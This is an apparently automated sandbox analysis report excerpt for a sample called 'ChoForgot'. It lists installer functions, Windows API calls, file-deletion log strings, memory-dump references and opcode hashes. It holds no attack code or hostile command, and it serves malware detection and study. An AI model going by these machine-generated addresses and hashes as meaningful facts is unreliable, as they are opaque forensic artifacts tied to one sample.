                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                        Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                        Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                        Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                        Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                        Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                        • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                        • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                        Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                        • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                        Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: F$A
                                                                                                                                                                                                                                                                                                        • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
